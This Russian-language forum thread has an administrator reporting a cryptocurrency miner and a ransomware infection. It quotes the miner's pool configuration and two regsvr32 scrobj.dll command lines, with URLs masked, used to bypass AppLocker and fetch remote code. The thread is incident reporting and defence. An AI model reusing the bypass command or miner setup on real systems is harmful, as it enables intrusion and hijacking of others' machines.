Майнер и шифровальщик

[NuLLsoft]

Здравствуйте.

 

Выловил пару файликов качающих майнер.

Создана задача в планировщике, действие: "...\AppData\Roaming\amd64_microsoft-windows-etw-rundown_31bf3856ad364e35_10.0.17134.1_none_dc4ffe912cae63fe\dfscli.exe" - этот файлик не сохранил, был удалён антивирусом, ещё в папке лежат два файла pcaui-1.3.exe и config.json.

Содержимое config.json:

{

"cpu-priority": 0,
"max-cpu-usage": 100,
"bfactor": 12,
"bsleep": 25,
"pools": [
{
"url": "stratum+tcp://185.127.24.232:77",
"user": "QUILHUIL",
"pass": "x",
"keepalive": true,
}
],
}

 

Если нужен pcaui-1.3.exe - напишите куда залить. Качал майнер на удалённый рабочий стол, пофиксил, проблем не доставил.

 

А вот второй зловред нашифровал дел. Но не всё так плохо, файлы юзеров какие живы, какие нет - не очень принципиально. Попали под замес базы 1С, которые были открыты - выжили, а которые закрыты - зашифрованы. Но были архивы на диске D, с доступом только определённых админов, можно сказать повезло, потеряли не очень много.

Как работал зловред: в планировщике скачивал и обновлял хром, запускал его с заданием и ломился в инет на удалённый комп за файлами, скачивал и запускал шифрование. В карантине кое что осталось, если нужно, залью, пишите куда.

Обошли AppLocker: 

CmdLine:C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe /u /s /i:******scrobj.dll

CmdLine:C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe C:\Windows\system32\regsvr32.exe /u /s /i:********crobj.dll

Защитник windows подавал сигналы, но пользователи не обратили внимание.

 

Сообщение от модератора Mark D/ Pearlstone

Вредоносные ссылки удалены.

[Friend]

@NuLLsoft, загрузите все в вирустотал и направьте вирусные лаборатории для детектирования, например, newvirus@kaspersky.com,

[TactoVotTac]

Файлы от amd? очень даже подозрительно...

[Peter15]

А должен ли антивирус Касперского детектить майнеры по сигнатурам?